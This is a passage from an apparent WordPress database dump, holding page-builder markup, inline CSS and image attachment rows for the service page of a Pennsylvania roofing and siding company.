type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-1a6b31cd-8a87-4edc-99f2-33dd2b097132\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Dunrite Roofing And Siding</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>Dunrite Roofing has been serving the surrounding areas for over 30 years</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Bringing more than 30 years of experience to every job, Stork &amp; Sons Roof Maintenance provides reliable roofing in Bucks County and the surrounding Lehigh Valley areas. Our company is family owned and operated, and you can count on us for roofing, siding, and stucco services. We are passionate about the work that we do and pride ourselves on delivering high-quality work at fair, upfront, and honest pricing. We also specialize in siding and roofing repairs for those home that do not need a full replacement just yet. Our roofing experts work with all types of materials. including shingles, flat roofs, and siding. We do tear-offs and cleanups.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When you need fast, dependable results for your roof or siding, call Stork &amp; Sons Roof Maintenance today for a fast, fair, and free estimate!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"d5c61675-ddb2-4433-a568-128785b48d5b\"} -->\n<style type=\"text/css\"> .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-d5c61675-ddb2-4433-a568-128785b48d5b skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"72780545-3bc2-4038-8814-1dd9138d037c\"} -->\n<style type=\"text/css\"> .block-72780545-3bc2-4038-8814-1dd9138d037c .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-72780545-3bc2-4038-8814-1dd9138d037c .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-72780545-3bc2-4038-8814-1dd9138d037c .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-72780545-3bc2-4038-8814-1dd9138d037c .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-72780545-3bc2-4038-8814-1dd9138d037c .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-72780545-3bc2-4038-8814-1dd9138d037c\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"084a0777-f0fe-40d8-8160-5e5511fafb42\"} -->\n<style type=\"text/css\"> .block-id-084a0777-f0fe-40d8-8160-5e5511fafb42 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-084a0777-f0fe-40d8-8160-5e5511fafb42 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-084a0777-f0fe-40d8-8160-5e5511fafb42 .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-084a0777-f0fe-40d8-8160-5e5511fafb42 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/1.jpg\" alt=\"\" data-id=\"467\" data-link=\"https://cteisys.com/services/repairs/attachment/1/\" class=\"wp-image-467\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/2.jpg\" alt=\"\" data-id=\"468\" data-link=\"https://cteisys.com/services/repairs/attachment/2/\" class=\"wp-image-468\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/3.jpg\" alt=\"\" data-id=\"469\" data-link=\"https://cteisys.com/services/repairs/attachment/3/\" class=\"wp-image-469\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/advanced-heading {\"block_id\":\"bad42304-f956-4ff6-a71d-3d0927546977\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":44,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-title-text {\n font-size: 44px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-bad42304-f956-4ff6-a71d-3d0927546977\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Where Caring for Our Community matters</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Determining the underlying issue is critical when diagnosing a roof repair. We specialize in finding this and proceed swiftly to correctly fix the issues the first time. Call today for a free estimate on a repair quote by Dunrite.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"8f988807-9a52-467a-ae6e-048f9f4c3534\",\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0} -->\n<div class=\"wp-block-skt-blocks-section skt-blocks-block-section-outer-wrap block-8f988807-9a52-467a-ae6e-048f9f4c3534 background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"d7963526-9288-4aa2-9602-2bca93be416b\"} -->\n<style type=\"text/css\"> .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-d7963526-9288-4aa2-9602-2bca93be416b skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"topMarginMobile\":0,\"bottomMarginMobile\":0,\"blockId\":\"f3c8d953-d75e-4cd0-a016-ebca0253c0de\"} -->\n<style type=\"text/css\"> .block-f3c8d953-d75e-4cd0-a016-ebca0253c0de .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-f3c8d953-d75e-4cd0-a016-ebca0253c0de .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-f3c8d953-d75e-4cd0-a016-ebca0253c0de .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-f3c8d953-d75e-4cd0-a016-ebca0253c0de .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-f3c8d953-d75e-4cd0-a016-ebca0253c0de .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 0px; margin-bottom: 0px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-f3c8d953-d75e-4cd0-a016-ebca0253c0de\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":471,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/4.jpg\" alt=\"\" class=\"wp-image-471\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"blockId\":\"b2950aec-7a93-4bd2-bdf0-d978b7373e18\",\"blockBorderRadius\":5} -->\n<style type=\"text/css\"> .block-b2950aec-7a93-4bd2-bdf0-d978b7373e18 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-b2950aec-7a93-4bd2-bdf0-d978b7373e18 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-b2950aec-7a93-4bd2-bdf0-d978b7373e18 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-b2950aec-7a93-4bd2-bdf0-d978b7373e18 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-b2950aec-7a93-4bd2-bdf0-d978b7373e18 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-b2950aec-7a93-4bd2-bdf0-d978b7373e18\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":473,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/6.jpg\" alt=\"\" class=\"wp-image-473\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">COMMON ISSUES CAUSING ROOF DAMAGE.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li> Improper design/installation</li><li>Restrictive/absence of Ventilation</li><li>Fallen trees/branches Faulty Skylight </li><li>Premature ridge cap failure</li></ul>\n<!-- /wp:list --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Repairs','','inherit','closed','closed','','269-autosave-v1','','','2022-08-24 17:03:31','2022-08-24 17:03:31','',269,'https://cteisys.com/?p=464',0,'revision','',0),(471,1,'2022-08-24 16:52:08','2022-08-24 16:52:08','','4','','inherit','','closed','','4','','','2022-08-24 16:52:08','2022-08-24 16:52:08','',269,'https://cteisys.com/wp-content/uploads/2022/08/4.jpg',0,'attachment','image/jpeg',0),(472,1,'2022-08-24 16:53:33','2022-08-24 16:53:33','','5','','inherit','','closed','','5','','','2022-08-24 16:53:33','2022-08-24 16:53:33','',269,'https://cteisys.com/wp-content/uploads/2022/08/5.jpg',0,'attachment','image/jpeg',0),(473,1,'2022-08-24 16:57:05','2022-08-24 16:57:05','','6','','inherit','','closed','','6','','','2022-08-24 16:57:05','2022-08-24 16:57:05','',269,'https://cteisys.com/wp-content/uploads/2022/08/6.jpg',0,'attachment','image/jpeg',0),(467,1,'2022-08-24 16:41:23','2022-08-24 16:41:23','','1','','inherit','','closed','','1','','','2022-08-24 16:41:23','2022-08-24 16:41:23','',269,'https://cteisys.com/wp-content/uploads/2022/08/1.jpg',0,'attachment','image/jpeg',0),(468,1,'2022-08-24 16:41:26','2022-08-24 16:41:26','','2','','inherit','','closed','','2','','','2022-08-24 16:41:26','2022-08-24 16:41:26','',269,'https://cteisys.com/wp-content/uploads/2022/08/2.jpg',0,'attachment','image/jpeg',0),(469,1,'2022-08-24 16:41:28','2022-08-24 16:41:28','','3','','inherit','','closed','','3','','','2022-08-24 16:41:28','2022-08-24 16:41:28','',269,'https://cteisys.com/wp-content/uploads/2022/08/3.jpg',0,'attachment','image/jpeg',0),(498,1,'2022-08-25 00:06:12','2022-08-25 00:06:12','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"9442ca66-a156-4eca-bc76-a1ce7a02d56a\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-9442ca66-a156-4eca-bc76-a1ce7a02d56a background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"d8f9dcbd-15b0-408f-ac6e-562c2306ed02\"} -->\n<style type=\"text/css\"> .block-d8f9dcbd-15b0-408f-ac6e-562c2306ed02 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-d8f9dcbd-15b0-408f-ac6e-562c2306ed02 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d8f9dcbd-15b0-408f-ac6e-562c2306ed02 